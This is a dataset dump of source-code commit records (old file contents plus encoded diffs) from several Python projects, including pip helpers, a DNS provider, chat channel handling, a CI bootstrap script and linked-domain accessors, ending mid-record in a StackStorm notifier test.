commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
|---|---|---|---|---|---|---|---|
8e35a5f5e7da38105961178478c33e92c81caf62
|
Use new homely._ui.system() instead of subprocess
|
homely/pipinstall.py
|
homely/pipinstall.py
|
from subprocess import check_output, check_call
from homely._engine2 import Helper, Cleaner, getengine
from homely._utils import haveexecutable
from homely._ui import isinteractive
def pipinstall(packagename, which, user=True):
engine = getengine()
for version in which:
assert version in (2, 3)
helper = PIPInstall(packagename, version, user)
engine.run(helper)
_known_pips = set()
def _haspkg(pipcmd, name):
output = check_output([pipcmd, 'list', '--disable-pip-version-check'])
find = '%s ' % name
for line in output.decode('utf-8').split("\n"):
if line.startswith(find):
return True
return False
class PIPInstall(Helper):
_name = None
_version = None
_user = False
def __init__(self, name, version, user):
super(PIPInstall, self).__init__()
self._name = name
self._version = version
self._user = user
self._pipcmd = {2: "pip2", 3: "pip3"}[version]
if self._pipcmd not in _known_pips:
if not haveexecutable(self._pipcmd):
# FIXME: what type of helpful error should we be raising here?
raise Exception("%s executable not found" % self._pipcmd)
_known_pips.add(self._pipcmd)
def getcleaner(self):
return PIPCleaner(self._name, self._pipcmd)
def pathsownable(self):
return {}
def getclaims(self):
yield "%s:%s" % (self._pipcmd, self._name)
def isdone(self):
return _haspkg(self._pipcmd, self._name)
@property
def description(self):
user = ' --user' if self._user else ''
return "%s install %s%s" % (self._pipcmd, self._name, user)
def makechanges(self):
cmd = [
self._pipcmd,
'install',
self._name,
'--disable-pip-version-check',
]
if self._user:
cmd.append('--user')
check_call(cmd)
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
self._setfact(factname, True)
def affectspath(self, path):
return False
class PIPCleaner(Cleaner):
def __init__(self, name, pipcmd):
super(PIPCleaner, self).__init__()
self._name = name
assert pipcmd in ('pip2', 'pip3')
self._pipcmd = pipcmd
def asdict(self):
return dict(name=self._name, pipcmd=self._pipcmd)
@classmethod
def fromdict(class_, data):
return class_(data["name"], data["pipcmd"])
def __eq__(self, other):
return self._name == other._name and self._pipcmd == other._pipcmd
def isneeded(self):
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
hasfact = self._getfact(factname, False)
return hasfact and _haspkg(self._pipcmd, self._name)
@property
def description(self):
return "%s uninstall %s" % (self._pipcmd, self._name)
def makechanges(self):
cmd = [
self._pipcmd,
'uninstall',
self._name,
'--disable-pip-version-check',
]
if not isinteractive():
cmd.append('--yes')
factname = 'pipinstall:%s:%s' % (self._pipcmd, self._name)
try:
check_call(cmd)
finally:
self._clearfact(factname)
return []
def needsclaims(self):
yield "%s:%s" % (self._pipcmd, self._name)
def wantspath(self, path):
return False
|
Python
| 0.000001
|
@@ -1,53 +1,4 @@
-from subprocess import check_output, check_call%0A%0A
from
@@ -125,16 +125,24 @@
eractive
+, system
%0A%0A%0Adef p
@@ -418,20 +418,14 @@
t =
-check_output
+system
(%5Bpi
@@ -468,17 +468,53 @@
-check'%5D
-)
+,%0A stdout=True)%5B1%5D
%0A fin
@@ -1919,34 +1919,30 @@
r')%0A
-check_call
+system
(cmd)%0A
@@ -3229,18 +3229,14 @@
-check_call
+system
(cmd
|
52eebb215f52ae73a881e3d4e9a695139c260d3b
|
Empty names should be called @
|
lexicon/providers/transip.py
|
lexicon/providers/transip.py
|
from __future__ import absolute_import
from .base import Provider as BaseProvider
from transip.client import DomainClient
def ProviderParser(subparser):
subparser.add_argument("--auth-username", help="specify username used to authenticate")
subparser.add_argument("--auth-api-key", help="specify API private key to authenticate")
subparser.add_argument("--auth-ca-bundle", help="specify CA bundle to use to verify API SSL certificate")
class Provider(BaseProvider):
def __init__(self, options):
super(Provider, self).__init__(options)
self.provider_name = 'transip'
self.domain_id = None
username = self.options.get('auth_username')
key_file = self.options.get('auth_api_key')
if not username or not key_file:
raise StandardError("No username and/or keyfile was specified")
self.client = DomainClient(
username=username,
key_file=key_file,
mode="readonly",
cacert=self.options.get('auth_ca_bundle', False)
)
# Authenticate against provider,
# Make any requests required to get the domain's id for this provider, so it can be used in subsequent calls.
# Should throw an error if authentication fails for any reason, of if the domain does not exist.
def authenticate(self):
## This request will fail when the domain does not exist,
## allowing us to check for existence
self.client.getInfo(self.options.get('domain'))
# Create record. If record already exists with the same content, do nothing'
def create_record(self, type, name, content):
raise NotImplementedError("Providers should implement this!")
# List all records. Return an empty list if no records found
# type, name and content are used to filter records.
# If possible filter during the query, otherwise filter after response is received.
def list_records(self, type=None, name=None, content=None):
records = self._filter_records(
records=self.client.getInfo(self.options.get('domain')).dnsEntries,
type=type,
name=name,
content=content
)
print 'list_records: {0}'.format(records)
return records
# Update a record. Identifier must be specified.
def update_record(self, identifier, type=None, name=None, content=None):
raise NotImplementedError("Providers should implement this!")
# Delete an existing record.
# If record does not exist, do nothing.
# If an identifier is specified, use it, otherwise do a lookup using type, name and content.
def delete_record(self, identifier=None, type=None, name=None, content=None):
raise NotImplementedError("Providers should implement this!")
def _filter_records(self, records, type=None, name=None, content=None):
_records = []
for record in records:
if (not type or record.type == type) and \
(not name or record.name == self._relative_name(name)) and \
(not content or record.content == content):
_records.append({
"name": record.name,
"type": record.type,
"content": record.content,
"ttl": record.expire
})
return _records
|
Python
| 0.998725
|
@@ -2776,24 +2776,197 @@
nt this!%22)%0A%0A
+ def _relative_name(self, record_name):%0A name = super(Provider, self)._relative_name(record_name)%0A if not name:%0A name = %22@%22%0A return name%0A%0A
def _fil
|
c3f872f306a0ff516e4dae227e6f963cb3841bf2
|
save excluded users in presence payload
|
channelstream/channel.py
|
channelstream/channel.py
|
import copy
import logging
import six
import uuid
from datetime import datetime
from channelstream import server_state
from channelstream.utils import process_catchup
log = logging.getLogger(__name__)
class Channel(object):
""" Represents one of our chat channels - has some config options """
config_keys = [
"notify_presence",
"store_history",
"history_size",
"broadcast_presence_with_user_lists",
"notify_state",
"store_frames",
]
def __init__(self, name, long_name=None, channel_config=None):
"""
:param name:
:param long_name:
:param channel_config:
"""
self.uuid = uuid.uuid4()
self.name = name
self.long_name = long_name
self.last_active = None
self.connections = {}
self.notify_presence = False
self.broadcast_presence_with_user_lists = False
# channel sends all user state key changes
self.notify_state = False
self.salvageable = False
self.store_history = False
self.store_frames = True
self.history_size = 10
self.history = []
# store frames for fetching when connection is established
self.frames = []
if channel_config:
self.reconfigure_from_dict(channel_config)
log.info("%s created" % self)
log.info("Configuration used: {}".format(channel_config))
self.mark_activity()
def mark_activity(self):
self.last_active = datetime.utcnow()
def get_catchup_frames(self, newer_than, username):
found = []
for t, f in self.frames:
# either old frame or user is excluded or PM not meant for user
if (
t < newer_than
or (f["exclude_users"] and username in f["exclude_users"])
or (f["pm_users"] and username not in f["pm_users"])
):
continue
found.append(process_catchup(f))
return found
def reconfigure_from_dict(self, config):
if config:
for key in self.config_keys:
val = config.get(key)
if val is not None:
setattr(self, key, val)
def add_connection(self, connection):
username = connection.username
connections = self.connections.setdefault(username, [])
if not connections and self.notify_presence:
self.send_notify_presence_info(username, "joined")
if connection not in connections:
connections.append(connection)
return True
return False
def remove_connection(self, connection):
was_found = False
username = connection.username
connections = self.connections.setdefault(username, [])
if connection in connections:
self.connections[username].remove(connection)
was_found = True
self.after_parted(username)
return was_found
def after_parted(self, username):
"""
Sends parted message if necessary and removed username from
connections if empty
:param username:
:return:
"""
if not self.connections[username]:
del self.connections[username]
if self.notify_presence:
self.send_notify_presence_info(username, "parted")
def send_notify_presence_info(self, username, action):
"""
Sends a message to other connected parties about a presence change
:param username:
:param action:
:return:
"""
connected_users = []
if self.broadcast_presence_with_user_lists:
for _username in self.connections.keys():
user_inst = server_state.USERS.get(_username)
user_data = {
"user": user_inst.username,
"state": user_inst.public_state,
}
connected_users.append(user_data)
self.mark_activity()
payload = {
"uuid": uuid.uuid4(),
"type": "presence",
"no_history": False,
"pm_users": [],
"exclude_users": [],
"user": username,
"users": connected_users,
"timestamp": self.last_active,
"channel": self.name,
"message": {"action": action},
"state": None,
"catchup": False,
}
if action == "joined":
payload["state"] = server_state.USERS[username].public_state
self.add_message(payload, exclude_users=[username])
return payload
def send_user_state(self, user_inst, changed):
self.mark_activity()
public_changed = [x for x in changed if x["key"] in user_inst.public_state]
payload = {
"uuid": uuid.uuid4(),
"type": "user_state_change",
"no_history": False,
"pm_users": [],
"exclude_users": [],
"user": user_inst.username,
"timestamp": self.last_active,
"catchup": False,
"channel": self.name,
"message": {"state": user_inst.public_state, "changed": public_changed},
}
self.add_message(payload)
return payload
def add_frame(self, frame):
if self.store_frames:
self.frames.append((datetime.utcnow(), frame))
self.frames = self.frames[-100:]
def add_to_history(self, message):
if self.store_history and message["type"] == "message":
self.history.append(message)
self.history = self.history[self.history_size * -1 :]
def add_message(self, message, pm_users=None, exclude_users=None):
"""
Sends the message to all connections subscribed to this channel
"""
pm_users = pm_users or []
exclude_users = exclude_users or []
self.mark_activity()
if not message['no_history']:
self.add_to_history(message)
self.add_frame(message)
message = copy.deepcopy(message)
# do not leak delivery info
del message['no_history']
del message['pm_users']
del message['exclude_users']
total_sent = 0
# message everyone subscribed except excluded
for user, conns in six.iteritems(self.connections):
if not exclude_users or user not in exclude_users:
for connection in conns:
if not pm_users or connection.username in pm_users:
connection.add_message(message)
total_sent += 1
return total_sent
def __repr__(self):
return "<Channel: %s, connections:%s>" % (self.name, len(self.connections))
def get_info(self, include_history=True, include_users=False):
settings = {k: getattr(self, k) for k in self.config_keys}
chan_info = {
"uuid": self.uuid,
"name": self.name,
"long_name": self.long_name,
"settings": settings,
"history": self.history if include_history else [],
"last_active": self.last_active,
"total_connections": sum(
[len(conns) for conns in self.connections.values()]
),
"total_users": 0,
"users": [],
}
for username in self.connections.keys():
user_inst = server_state.USERS.get(username)
if include_users and user_inst.username not in chan_info["users"]:
chan_info["users"].append(user_inst.username)
chan_info["users"] = sorted(chan_info["users"])
chan_info["total_users"] = len(chan_info["users"])
return chan_info
def __json__(self, request=None):
return self.get_info()
|
Python
| 0.000001
|
@@ -1954,16 +1954,17 @@
ontinue%0A
+%0A
@@ -4211,32 +4211,40 @@
xclude_users%22: %5B
+username
%5D,%0A %22
@@ -4637,25 +4637,39 @@
e_users=
-%5Busername
+payload%5B%22exclude_users%22
%5D)%0A
|
c0da9801f726ab3ac5c360f77598f1d14c615c2e
|
make sure windrose_utils._make_plot gets exercised!
|
pyiem/tests/test_windrose_utils.py
|
pyiem/tests/test_windrose_utils.py
|
import unittest
import datetime
import psycopg2
from pyiem.windrose_utils import windrose, _get_timeinfo
class Test(unittest.TestCase):
def test_timeinfo(self):
"""Exercise the _get_timeinfo method"""
res = _get_timeinfo(range(1, 10), 'hour', 24)
self.assertEquals(res['labeltext'], '(1, 2, 3, 4, 5, 6, 7, 8, 9)')
res = _get_timeinfo([1], 'month', 1)
self.assertEquals(res['sqltext'],
' and extract(month from valid) = 1 ')
def test_windrose(self):
"""Exercise the windrose code"""
pgconn = psycopg2.connect(database='asos', host="iemdb")
cursor = pgconn.cursor()
v = datetime.datetime(2015, 1, 1, 6)
for s in range(100):
v += datetime.timedelta(hours=1)
cursor.execute("""INSERT into t2015(station, valid, sknt, drct)
VALUES (%s, %s, %s, %s)""", ('AMW2', v, s, s))
# plot.windrose('AMW2', fp='/tmp/test_plot_windrose.png',
# cursor=cursor)
fig = windrose('AMW2',
cursor=cursor, justdata=True)
self.assertTrue(fig is not None)
fig = windrose('AMW2',
cursor=cursor, sts=datetime.datetime(2001, 1, 1),
ets=datetime.datetime(2001, 1, 2))
self.assertTrue(fig is not None)
res = windrose('AMW2',
cursor=cursor, sts=datetime.datetime(2015, 1, 1),
ets=datetime.datetime(2015, 10, 2), justdata=True)
assert isinstance(res, str)
|
Python
| 0
|
@@ -925,157 +925,30 @@
-# plot.windrose('AMW2', fp='/tmp/test_plot_windrose.png',%0A # cursor=cursor)%0A fig = windrose('AMW2',%0A
+fig = windrose('AMW2',
cur
@@ -959,29 +959,28 @@
cursor,
-justdata=True
+sname='Ames'
)%0A
@@ -1169,17 +1169,70 @@
e(20
-0
1
+6
, 1,
-2)
+1))%0A # fig.savefig('/tmp/test_plot_windrose.png'
)%0A
|
d32d57fc07b595c4dc0a24a04ac4589ad5d16918
|
Make modules uninstallable
|
hotel/__openerp__.py
|
hotel/__openerp__.py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name" : "Hotel Management Base",
"version" : "1.0",
"author" : "Tiny,Odoo Community Association (OCA)",
"category" : "Generic Modules/Hotel Management",
"description": """
Module for Hotel/Resort/Rooms/Property management. You can manage:
* Configure Property
* Hotel Configuration
* Check In, Check out
* Manage Folio
* Payment
Different reports are also provided, mainly for hotel statistics.
""",
"depends" : ["sale"],
"init_xml" : [],
"demo_xml" : [
],
"update_xml" : [
"hotel_view.xml",
"hotel_data.xml",
"hotel_folio_workflow.xml",
"report/hotel_report.xml",
"wizard/hotel_wizard.xml",
"security/hotel_security.xml",
"security/ir.model.access.csv",
],
"active": False,
'installable': False,
'application': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Python
| 0
| |
eca18d440d37e3caebe049617910420e6d37d507
|
remove execute bit from compare_ir python script
|
src/compiler/glsl/tests/compare_ir.py
|
src/compiler/glsl/tests/compare_ir.py
|
#!/usr/bin/env python
# coding=utf-8
#
# Copyright © 2011 Intel Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# Compare two files containing IR code. Ignore formatting differences
# and declaration order.
import os
import os.path
import subprocess
import sys
import tempfile
from sexps import *
if len(sys.argv) != 3:
print 'Usage: python2 ./compare_ir.py <file1> <file2>'
exit(1)
with open(sys.argv[1]) as f:
ir1 = sort_decls(parse_sexp(f.read()))
with open(sys.argv[2]) as f:
ir2 = sort_decls(parse_sexp(f.read()))
if ir1 == ir2:
exit(0)
else:
file1, path1 = tempfile.mkstemp(os.path.basename(sys.argv[1]))
file2, path2 = tempfile.mkstemp(os.path.basename(sys.argv[2]))
try:
os.write(file1, '{0}\n'.format(sexp_to_string(ir1)))
os.close(file1)
os.write(file2, '{0}\n'.format(sexp_to_string(ir2)))
os.close(file2)
subprocess.call(['diff', '-u', path1, path2])
finally:
os.remove(path1)
os.remove(path2)
exit(1)
|
Python
| 0
| |
39d89982a2a2bba810e51614158bf474cba500dc
|
Add more ComputerPlayer names
|
computer_player.py
|
computer_player.py
|
import random
import sys
import time
from player import Player
from solving_algorithm import generate_solutions
class ComputerPlayer(Player):
def __init__(self):
super(ComputerPlayer, self).__init__()
self.PAUSE = 0.1
self.names = ['Chell', 'GLaDOS', 'Companion Cube', 'Curiosity Core', 'Wheatley', 'Caroline']
self.solutions = []
def __type(self, message):
sys.stdout.write(' ')
sys.stdout.flush()
time.sleep(self.PAUSE * 5)
for character in message:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(self.PAUSE)
time.sleep(self.PAUSE * 5)
print
def remember_rules(self, pattern_length, pattern_colours):
self.pattern_length = pattern_length
self.pattern_colours = pattern_colours
def get_ready(self):
self.colours = []
self.colours_tried = 0
self.solving_phase = 1
def ask_for_name(self, message=''):
self.name = random.choice(self.names)
if message:
print message.rstrip(),
self.__type(self.name)
def choose_secret_pattern(self, message=''):
self.secret_pattern = []
for colour in range(self.pattern_length):
self.secret_pattern.append(random.choice(self.pattern_colours))
if message:
print message.rstrip(),
self.__type("?" * self.pattern_length)
def make_guess(self, message=''):
self.guess = []
if self.solving_phase == 1:
colour = list(self.pattern_colours).pop(self.colours_tried)
for peg in range(self.pattern_length):
self.guess.append(colour)
elif self.solving_phase == 2:
for colour in self.solutions:
self.guess.append(colour)
elif self.solving_phase == 3:
solution = self.solutions.pop()
for colour in solution:
self.guess.append(colour)
if message:
print message.rstrip(),
self.__type(''.join(self.guess))
def analyse_feedback(self, feedback):
if self.solving_phase == 1:
colour = self.guess[0]
for key in feedback:
self.colours.append(colour)
self.colours_tried += 1
if self.colours_tried == len(self.pattern_colours) - 1:
colour = list(self.pattern_colours).pop(self.colours_tried)
for colour in range(self.pattern_length - len(self.colours)):
self.colours.append(colour)
self.colours_tried += 1
if len(self.colours) == self.pattern_length:
self.solutions = self.colours
self.solving_phase = 2
elif self.solving_phase == 2:
self.solutions = generate_solutions(self.guess, feedback)
self.solving_phase = 3
elif self.solving_phase == 3:
new_solutions = generate_solutions(self.guess, feedback)
solutions = []
for solution in self.solutions:
if solution in new_solutions:
solutions.append(solution)
self.solutions = solutions
|
Python
| 0
|
@@ -281,62 +281,96 @@
, 'C
-ompanion Cub
+uriosity Cor
e', '
-Curiosity Core', 'Wheatley', 'Carolin
+Turret', 'Companion Cube', 'Wheatley', 'Cave Johnson', 'Caroline', 'Cak
e'%5D%0A
|
8f8dbfef262021b377974f5fa8fecd6c89cebed4
|
Install missing deps.
|
ci/appveyor-bootstrap.py
|
ci/appveyor-bootstrap.py
|
"""
AppVeyor will at least have few Pythons around so there's no point of implementing a bootstrapper in PowerShell.
This is a port of https://github.com/pypa/python-packaging-user-guide/blob/master/source/code/install.ps1
with various fixes and improvements that just weren't feasible to implement in PowerShell.
"""
from __future__ import print_function
from os import environ
from os.path import exists
from subprocess import check_call
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
BASE_URL = "https://www.python.org/ftp/python/"
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
GET_PIP_PATH = "C:\get-pip.py"
URLS = {
("2.7", "64"): BASE_URL + "2.7.13/python-2.7.13.amd64.msi",
("2.7", "32"): BASE_URL + "2.7.13/python-2.7.13.msi",
("3.4", "64"): BASE_URL + "3.4.4/python-3.4.4.amd64.msi",
("3.4", "32"): BASE_URL + "3.4.4/python-3.4.4.msi",
("3.5", "64"): BASE_URL + "3.5.4/python-3.5.4-amd64.exe",
("3.5", "32"): BASE_URL + "3.5.4/python-3.5.4.exe",
("3.6", "64"): BASE_URL + "3.6.2/python-3.6.2-amd64.exe",
("3.6", "32"): BASE_URL + "3.6.2/python-3.6.2.exe",
}
INSTALL_CMD = {
# Commands are allowed to fail only if they are not the last command. Eg: uninstall (/x) allowed to fail.
"2.7": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.4": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.5": [["{path}", "/quiet", "TargetDir={home}"]],
"3.6": [["{path}", "/quiet", "TargetDir={home}"]],
}
def download_file(url, path):
print("Downloading: {} (into {})".format(url, path))
progress = [0, 0]
def report(count, size, total):
progress[0] = count * size
if progress[0] - progress[1] > 1000000:
progress[1] = progress[0]
print("Downloaded {:,}/{:,} ...".format(progress[1], total))
dest, _ = urlretrieve(url, path, reporthook=report)
return dest
def install_python(version, arch, home):
print("Installing Python", version, "for", arch, "bit architecture to", home)
if exists(home):
return
path = download_python(version, arch)
print("Installing", path, "to", home)
success = False
for cmd in INSTALL_CMD[version]:
cmd = [part.format(home=home, path=path) for part in cmd]
print("Running:", " ".join(cmd))
try:
check_call(cmd)
except Exception as exc:
print("Failed command", cmd, "with:", exc)
if exists("install.log"):
with open("install.log") as fh:
print(fh.read())
else:
success = True
if success:
print("Installation complete!")
else:
print("Installation failed")
def download_python(version, arch):
for _ in range(3):
try:
return download_file(URLS[version, arch], "installer.exe")
except Exception as exc:
print("Failed to download:", exc)
print("Retrying ...")
def install_pip(home):
pip_path = home + "/Scripts/pip.exe"
python_path = home + "/python.exe"
if exists(pip_path):
print("pip already installed.")
else:
print("Installing pip...")
download_file(GET_PIP_URL, GET_PIP_PATH)
print("Executing:", python_path, GET_PIP_PATH)
check_call([python_path, GET_PIP_PATH])
def install_packages(home, *packages):
cmd = [home + "/Scripts/pip.exe", "install"]
cmd.extend(packages)
check_call(cmd)
if __name__ == "__main__":
install_python(environ['PYTHON_VERSION'], environ['PYTHON_ARCH'], environ['PYTHON_HOME'])
install_pip(environ['PYTHON_HOME'])
install_packages(environ['PYTHON_HOME'], "setuptools>=18.0.1", "wheel", "tox", "virtualenv>=13.1.0")
|
Python
| 0
|
@@ -3932,64 +3932,26 @@
'%5D,
-%22setuptools%3E=18.0.1%22, %22
+'tox-
wheel
-%22, %22tox%22, %22virtualenv%3E=13.1.0%22
+', 'twine'
)%0A
|
b59c1299dab672f4670e2fdbe7ae4f959deab118
|
Version bump
|
conans/__init__.py
|
conans/__init__.py
|
# Allow conans to import ConanFile from here
# to allow refactors
from conans.client.build.autotools_environment import AutoToolsBuildEnvironment
from conans.client.build.cmake import CMake
from conans.client.build.meson import Meson
from conans.client.build.msbuild import MSBuild
from conans.client.build.visual_environment import VisualStudioBuildEnvironment
from conans.client.run_environment import RunEnvironment
from conans.model.conan_file import ConanFile
from conans.model.options import Options
from conans.model.settings import Settings
from conans.util.files import load
# complex_search: With ORs and not filtering by not restricted settings
COMPLEX_SEARCH_CAPABILITY = "complex_search"
CHECKSUM_DEPLOY = "checksum_deploy" # Only when v2
REVISIONS = "revisions" # Only when enabled in config, not by default look at server_launcher.py
ONLY_V2 = "only_v2" # Remotes and virtuals from Artifactory returns this capability
SERVER_CAPABILITIES = [COMPLEX_SEARCH_CAPABILITY, REVISIONS] # Server is always with revisions
DEFAULT_REVISION_V1 = "0"
__version__ = '1.13.2'
|
Python
| 0.000001
|
@@ -1073,11 +1073,11 @@
= '1.13.
-2
+3
'%0A
|
c2c2c99326938a6c0064b4bdb80c37bd05fbd013
|
fix url namespace
|
corehq/apps/linked_domain/remote_accessors.py
|
corehq/apps/linked_domain/remote_accessors.py
|
from __future__ import absolute_import
import requests
from couchdbkit.exceptions import ResourceNotFound
from django.urls.base import reverse
from requests import ConnectionError
from corehq.apps.app_manager.dbaccessors import wrap_app
from corehq.apps.hqmedia.models import CommCareMultimedia
from corehq.apps.linked_domain.auth import ApiKeyAuth
from corehq.apps.linked_domain.exceptions import RemoteRequestError, RemoteAuthError, ActionNotPermitted
from corehq.util.view_utils import absolute_reverse
from dimagi.utils.logging import notify_exception
def get_toggles_previews(domain_link):
return _do_simple_request('remote:toggles', domain_link)
def get_custom_data_models(domain_link, limit_types=None):
url = reverse('remote:custom_data_models', args=[domain_link.linked_domain])
params = None
if limit_types:
params = [('type', type_) for type_ in limit_types]
_do_request_to_remote_hq(url, domain_link.remote_details, domain_link.linked_domain, params)
return _do_simple_request('remote:custom_data_models', domain_link)
def get_user_roles(domain_link):
return _do_simple_request('remote:user_roles', domain_link)['user_roles']
def get_released_app_version(domain, app_id, remote_details):
url = reverse('current_app_version', args=[domain, app_id])
response = _do_request_to_remote_hq_json(url, remote_details, None)
return response.get('latestReleasedBuild')
def get_released_app(domain, app_id, linked_domain, remote_details):
url = reverse('linked_domain:latest_released_app_source', args=[domain, app_id])
response = _do_request_to_remote_hq_json(url, remote_details, linked_domain)
return _convert_app_from_remote_linking_source(response)
def whilelist_app_on_remote(domain, app_id, linked_domain, remote_details):
url = reverse('patch_linked_app_whitelist', args=[domain, app_id])
params = {
'whitelist_item': absolute_reverse('domain_homepage', args=[linked_domain])
}
_do_request_to_remote_hq(url, remote_details, None, params, method='patch')
def _convert_app_from_remote_linking_source(app_json):
attachments = app_json.pop('_LAZY_ATTACHMENTS', {})
app = wrap_app(app_json)
app._LAZY_ATTACHMENTS = attachments
return app
def pull_missing_multimedia_for_app(app):
missing_media = _get_missing_multimedia(app)
_fetch_remote_media(app.domain, missing_media, app.remote_app_details)
def _get_missing_multimedia(app):
missing = []
for path, media_info in app.multimedia_map.items():
try:
local_media = CommCareMultimedia.get(media_info['multimedia_id'])
except ResourceNotFound:
filename = path.split('/')[-1]
missing.append((filename, media_info))
else:
_check_domain_access(app.domain, local_media)
return missing
def _check_domain_access(domain, media):
if domain not in media.valid_domains:
media.add_domain(domain)
def _fetch_remote_media(local_domain, missing_media, remote_app_details):
for filename, item in missing_media:
media_class = CommCareMultimedia.get_doc_class(item['media_type'])
content = _fetch_remote_media_content(item, remote_app_details)
media_item = media_class.get_by_data(content)
media_item._id = item['multimedia_id']
media_item.attach_data(content, original_filename=filename)
media_item.add_domain(local_domain, owner=True)
def _fetch_remote_media_content(media_item, remote_app_details):
url = reverse('hqmedia_download', args=[media_item['media_type'], media_item['multimedia_id']])
response = _do_request_to_remote_hq(url, remote_app_details, None)
return response.content
def _do_simple_request(url_name, domain_link):
url = reverse(url_name, args=[domain_link.master_domain])
return _do_request_to_remote_hq_json(url, domain_link.remote_details, domain_link.linked_domain)
def _do_request_to_remote_hq_json(relative_url, remote_details, linked_domain, params=None, method='get'):
return _do_request_to_remote_hq(relative_url, remote_details, linked_domain, params, method).json()
def _do_request_to_remote_hq(relative_url, remote_details, linked_domain, params=None, method='get'):
"""
:param relative_url: Relative URL on remote HQ
:param remote_details: RemoteDetails object containing remote URL base and auth details
:param linked_domain: Used for permission check on remote system
:param params: GET/POST params to include
:param method:
:return:
"""
url_base = remote_details.url_base
username = remote_details.username
api_key = remote_details.api_key
full_url = u'%s%s' % (url_base, relative_url)
headers = {
'HQ-REMOTE-REQUESTER': absolute_reverse('domain_homepage', args=[linked_domain])
}
try:
response = requests.request(
method, full_url,
params=params, auth=ApiKeyAuth(username, api_key), headers=headers
)
except ConnectionError:
notify_exception(None, "Error performing remote app request", details={
'remote_url': full_url,
'params': params,
'headers': headers
})
raise RemoteRequestError(response.status_code)
if response.status_code == 401:
raise RemoteAuthError(response.status_code)
elif response.status_code == 403:
raise ActionNotPermitted(response.status_code)
elif response.status_code != 200:
notify_exception(None, "Error performing remote app request", details={
'remote_url': full_url,
'response_code': response.status_code,
'params': params
})
raise RemoteRequestError(response.status_code)
return response
|
Python
| 0.999895
|
@@ -622,22 +622,29 @@
equest('
-remote
+linked_domain
:toggles
@@ -739,22 +739,29 @@
everse('
-remote
+linked_domain
:custom_
@@ -1034,22 +1034,29 @@
equest('
-remote
+linked_domain
:custom_
@@ -1148,22 +1148,29 @@
equest('
-remote
+linked_domain
:user_ro
|
068e12ebb0fc36fc3bfa397a58c54aa92e361f9a
|
Clean up unit test in test_notifier
|
st2actions/tests/unit/test_notifier.py
|
st2actions/tests/unit/test_notifier.py
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import unittest2
import st2tests.config as tests_config
tests_config.parse_args()
from st2actions.notifier import Notifier
from st2common.constants.triggers import INTERNAL_TRIGGER_TYPES
from st2common.models.db.action import LiveActionDB, NotificationSchema
from st2common.models.db.action import NotificationSubSchema
from st2common.models.system.common import ResourceReference
ACTION_TRIGGER_TYPE = INTERNAL_TRIGGER_TYPES['action'][0]
NOTIFY_TRIGGER_TYPE = INTERNAL_TRIGGER_TYPES['action'][1]
class NotifierTestCase(unittest2.TestCase):
    """Verifies the payloads Notifier.process() dispatches for the internal
    action and notify triggers."""

    class MockDispatcher(object):
        # Stand-in for the real trigger dispatcher: instead of publishing,
        # it asserts on every payload it receives.

        def __init__(self, tester):
            # `tester` is the enclosing TestCase, used for assertions.
            self.tester = tester
            self.notify_trigger = ResourceReference.to_string_reference(
                pack=NOTIFY_TRIGGER_TYPE['pack'],
                name=NOTIFY_TRIGGER_TYPE['name'])
            self.action_trigger = ResourceReference.to_string_reference(
                pack=ACTION_TRIGGER_TYPE['pack'],
                name=ACTION_TRIGGER_TYPE['name'])

        def dispatch(self, *args, **kwargs):
            try:
                self.tester.assertEqual(len(args), 1)
                self.tester.assertTrue('payload' in kwargs)
                payload = kwargs['payload']
                # Assertions for the "notify" trigger payload.
